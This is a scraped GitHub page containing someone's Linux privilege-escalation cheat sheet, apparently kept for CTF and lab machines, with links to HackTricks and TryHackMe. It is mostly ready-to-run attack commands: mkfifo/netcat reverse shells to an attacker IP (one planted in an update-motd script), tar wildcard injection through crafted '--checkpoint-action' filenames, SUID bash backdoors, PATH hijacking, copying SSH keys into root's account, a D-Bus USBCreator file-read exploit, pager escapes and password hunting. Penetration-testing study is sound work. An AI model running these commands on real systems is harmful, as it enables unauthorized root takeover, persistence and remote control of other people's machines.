-
Notifications
You must be signed in to change notification settings - Fork 14
Linux Privilege Escalation
https://book.hacktricks.xyz/linux-unix/privilege-escalation
https://tryhackme.com/room/linuxprivesc
https://tryhackme.com/room/linuxprivescarena
script /dev/null -c bash
^Z
stty raw -echo; fg
nc -lnvp 443
reset
reset: unknown terminal type unknown
Terminal type? screen
www-data@victim:~/dirs$ checking users, architecture and services.
history
cat ~/.bash_history
cat .viminfo # https://youtu.be/kbw4_4jUP_U?t=1915
which gcc # https://github.com/mzet-/linux-exploit-suggester
find . -type f -ls # under /home/user dir, finding all files
find / -type d -name '.git' 2>/dev/null
-
cat /etc/exports -
showmount -e $IP -
https://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/
-
https://steflan-security.com/linux-privilege-escalation-exploiting-nfs-shares/
-
https://resources.infosecinstitute.com/topic/exploiting-nfs-share/
/opt
/dev/shm
/var/www/html # looking for sql credentials
ls -alh /home/user # looking for .sth_customized
- Search
find / -perm /4000 2>/dev/nullorfind / -perm -u=s -type f 2>/dev/null - Find all U&G
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null - SUID3NUM! RUN IT BEFORE linpeas https://github.com/Anon-Exploiter/SUID3NUM
- Either gtfobins works or use
stringsorltrace - Find files owned by lateralUser
find / -user lateralUser 2>/dev/null - Exploit
ls -l /bin/bash/bin/bash -p apt list --upgradable- Worth to mention, try both with/without
sudo. Likenmap --interactive
It needs something like popen or execv whom open other processes. The bash script can work under popen('div-script ...snip...').
In other more common scenarios, bash scripts don't honour SUID for security reasons. Use msfvenom to generate elf instead.
user@debian:~$ echo "/bin/bash" > service
user@debian:~$ chmod +x service
user@debian:~$ PATH=.:$PATH /usr/local/bin/suid-env
getcap *
getcap -r / 2>/dev/null
ls -al /usr/bin/ | grep -i suid-binary
man capabilities
or specific a user
grep 'marcus' /etc -R 2>/dev/null
groupsfind / -group staff 2>/dev/nullpspy
Debian: https://wiki.debian.org/SystemGroups
Ubuntu: https://www.phy.ntnu.edu.tw/demolab/html.php?html=doc/base-passwd/users-and-groups
https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attack ip> 4242 >/tmp/f" > shell.sh
touch "/absolute/path/that/writable/--checkpoint-action=exec=sh shell.sh"
touch /var/www/html/--checkpoint=1
-
sudo -u user commandorsudo -l -
su -better than without the dash - https://www.cyberciti.biz/open-source/command-line-hacks/linux-run-command-as-different-user/
- https://www.oreilly.com/library/view/linux-security-cookbook/0596003919/ch05s03.html
- https://unix.stackexchange.com/questions/7013/why-do-we-use-su-and-not-just-su
cat /etc/crontab crontabs crontab -l crontab -e and more https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs
or ps -aux ps aux for running process
#!/bin/bash
cp /bin/bash /bin/alvins
chmod u+s /bin/alvinsps aux
Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 12
# Grab more info for a specific one
ps auxww | grep vnc
... 000 -rfbauth /root/.vnc/passwd -rfbport 5901 -localhost -nolisten tcp :1
ps -ax | grep <port> # Get ports from Jetstar
ln -s /home/user/.ssh /writable/path/under/cron
https://crontab-generator.org/
echo "cp /home/sysadmin/.ssh/authorized_keys /root/.ssh/" >> 00-header # /etc/update-motd.d/00-header
echo "rm /tmp/g;mkfifo /tmp/g;cat /tmp/g|sh -i 2>&1|nc 10.10.16.6 4244 >/tmp/g" >> /etc/update-motd.d/00-header # Seeing close the /g here
https://0xdf.gitlab.io/2020/06/23/htb-popcorn.html#priv-www-data--root
Keep looking into the .ssh folder. It may surprise you.
netstat -tunlp
netstat -tunleep4 | grep "127.0.0.1"
netstat -tulpn | grep LISTEN
netstat -ano # will also give Active UNIX domain sockets
ss -tupln
Find a folder includes something like .bashrc or .cache to put the id_rsa.pub into the .ssh/authorized_keys
ssh strapi@horizontall.htb -i .ssh/id_rsa -L 8080:127.0.0.1:8443
Then you can open 8080 on your kali to see what happening on target's 8443. Interesting thing: Try HTTPS when you see 443. https://localhost:8080
find . | grep conf
https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/
found vuln under /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf
gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/root.txt /dev/shm/.0xdf true
./linpeas.sh | tee linlog.txt-
sed -n -e 1,500p winpeas_fast-> Read result separately to fit the terminal - pspy Always try to login via ssh again after setup since it may trigger some treats. Also be patient on it
ps -ef | grep root- If Python2 exist https://github.com/sleventyeleven/linuxprivchecker
grep --color=auto -rnw '/' -ie "PASSWORD=" --color=always 2>/dev/null
locate password | more
- https://www.hackingarticles.in/lxd-privilege-escalation/
- https://github.com/netbiosX/Checklists/blob/master/Linux-Privilege-Escalation.md
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md
- https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html
- https://payatu.com/guide-linux-privilege-escalation
- https://null-byte.wonderhowto.com/how-to/find-exploit-suid-binaries-with-suid3num-0215789/
https://www.hackingarticles.in/linux-for-pentester-apt-privilege-escalation/
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
https://gtfobins.github.io/gtfobins/journalctl/
The trick here is that journalctrl will output to stdout if it can fit onto the current page, but into less if it can’t. Since I’m running it with -n 5, that means only five lines come out, so I need to shrink my terminal to smaller than 5 lines, and I’ll get sent into less, still as root.
Start with a small terminal or stty rows 3
capsh --print